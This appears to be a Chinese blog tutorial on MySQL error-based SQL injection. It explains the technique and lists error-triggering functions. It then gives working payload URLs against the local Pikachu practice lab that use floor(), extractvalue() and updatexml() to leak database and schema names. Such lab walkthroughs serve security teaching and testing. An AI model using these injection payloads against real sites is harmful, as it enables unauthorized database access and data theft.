网站首页 > 技术文章 正文
一、报错注入的定义
报错注入就是利用了数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
二、利用报错注入的前提
1.页面上没有显示位,但是必须有SQL语句执行错误的信息。
三、报错注入的优缺点
1.优点:不需要显示位,如果有显示位建议使用union联合查询。
2.缺点:需要有SQL语句的报错信息。
四、构造报错注入的基本步骤
- 构造目标查询语句;
- 选择报错注入函数;
- 构造报错注入语句;
- 拼接报错注入语句;
五、常见的报错注入函数
- floor();
- extractvalue();
- updatexml();
- geometrycollection();
- multipoint();
- polygon();
- multipolygon();
- linestring();
- multilinestring();
- exp();
六、报错注入演示(只演示前三个)
1.利用floor()函数进行报错注入
主要报错原因为:count()+rand()+group_by()导致主键重复。
因为floor(rand(0)*2)的重复性,导致group by语句出错。group by key的原理是循环读取数据的每一行,将结果保存于临时表中。读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。
(1)获取当前数据库库名 :
代码语言:javascript
http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'union select 1,count(*) from information_schema.tables group by concat(0x7e,database(),0x7e,floor(rand(0)*2))--+&submit=aeyenèc
查询结果:
2.利用extractvalue()函数进行报错注入
extractvalue()函数为MYSQL对XML文档数据进行查询的XPATH函数。
语法: extractValue(xml_document, xpath_string);
第一个参数:XML_document是String格式,为XML文档对象的名称,
第二个参数:XPath_string (Xpath格式的字符串);
Xpath定位必须是有效的,否则则会发生错误;所以可以在这个位置植入表达式,做执行后报错
!注意:一次返回值最大为32位,当数据库名大于32,需要结合其他方式使用(可以使用substr());
(1)获取当前数据库库名
代码语言:javascript
http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'and extractvalue(1,concat(1,(select database())))--+&submit=aeyenèc
查询结果:
(2)获取所有的数据库库名
代码语言:javascript
http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili'and extractvalue(1,concat(1,(select group_concat(schema_name)from information_schema.schemata)))--+&submit=aeyenèc
查询结果:
由于extractvalue()函数一次性最大只返回32位,所以接下来可以使用substr()函数输入所有的数据
(3)使用substr()函数截取所有的数据
代码语言:javascript
http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and extractvalue(1,concat(1,(select substr((select group_concat(schema_name) from information_schema.schemata),1,20)))) --++&submit=aeyenèc
查询结果:
3.利用updatexml()函数进行报错注入
updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数。
语法:UPDATEXML (xml_document, XPathstring, new_value)。
第一个参数:xml_document,文档名称。
第二个参数:XPathstring (Xpath格式的字符串),做内容定位。
第三个参数:new_value,String格式,替换查找到的符合条件的值。
!注意:一次返回值最大为32位,当数据库名大于32,需要结合其他方式使用(可以使用substr());
(1)获取当前数据库库名
代码语言:javascript
http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and updatexml(1,concat(0x7e,(select database()),0x7e),1)--++&submit=aeyenèc
查询结果:
!0x7e为“~”。
(2)获取所有数据库库名
代码语言:javascript
http://localhost/pikachu/vul/sqli/sqli_str.php?name=lili' and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata),0x7e),1)--++&submit=aeyenèc
group_concat()函数表示将数据一次性输出。
查询结果:
猜你喜欢
- 2025-10-02 通过sql注入获取用户名和密码_sql注入万能密码
- 2025-10-02 SQL窗口函数详解及面试题真题_sql的窗口函数
- 2025-10-02 SQL行转列(Pivot)操作的通用方法(CASE WHEN语句)
- 2025-10-02 SQL 聚合函数有哪些_说出5种sql中常用的聚合函数
- 2025-10-02 java项目数据库从mysql迁移到postgresql经验
- 2025-10-02 WPS/Excel职场办公最常用的60个函数大全(含卡片),效率翻倍!
- 2025-10-02 SQL 语言日常使用 100 条经典命令(收藏级)
- 2025-10-02 MySQL统计查询优化:内存临时表的正确打开方式
- 2025-10-02 MySql 8.0.33 主从实战配置及迁移企业生产数据
- 2025-10-02 如何删除 MySQL 数据库中的所有数据表 ?
- 10-02基于深度学习的铸件缺陷检测_如何控制和检测铸件缺陷?有缺陷铸件如何处置?
- 10-02Linux Mint 22.1 Cinnamon Edition 搭建深度学习环境
- 10-02AWD-LSTM语言模型是如何实现的_lstm语言模型
- 10-02NVIDIA Jetson Nano 2GB 系列文章(53):TAO模型训练工具简介
- 10-02使用ONNX和Torchscript加快推理速度的测试
- 10-02tensorflow GPU环境安装踩坑日记_tensorflow配置gpu环境
- 10-02Keye-VL-1.5-8B 快手 Keye-VL— 腾讯云两卡 32GB GPU保姆级部署指南
- 10-02Gateway_gateways
- 最近发表
-
- 基于深度学习的铸件缺陷检测_如何控制和检测铸件缺陷?有缺陷铸件如何处置?
- Linux Mint 22.1 Cinnamon Edition 搭建深度学习环境
- AWD-LSTM语言模型是如何实现的_lstm语言模型
- NVIDIA Jetson Nano 2GB 系列文章(53):TAO模型训练工具简介
- 使用ONNX和Torchscript加快推理速度的测试
- tensorflow GPU环境安装踩坑日记_tensorflow配置gpu环境
- Keye-VL-1.5-8B 快手 Keye-VL— 腾讯云两卡 32GB GPU保姆级部署指南
- Gateway_gateways
- Coze开源本地部署教程_开源canopen
- 扣子开源本地部署教程 丨Coze智能体小白喂饭级指南
- 标签列表
-
- cmd/c (90)
- c++中::是什么意思 (84)
- 标签用于 (71)
- 主键只能有一个吗 (77)
- c#console.writeline不显示 (95)
- pythoncase语句 (88)
- es6includes (74)
- sqlset (76)
- apt-getinstall-y (100)
- node_modules怎么生成 (87)
- chromepost (71)
- flexdirection (73)
- c++int转char (80)
- mysqlany_value (79)
- static函数和普通函数 (84)
- el-date-picker开始日期早于结束日期 (76)
- js判断是否是json字符串 (75)
- c语言min函数头文件 (77)
- asynccallback (87)
- localstorage.removeitem (74)
- vector线程安全吗 (70)
- java (73)
- js数组插入 (83)
- mac安装java (72)
- 无效的列索引 (74)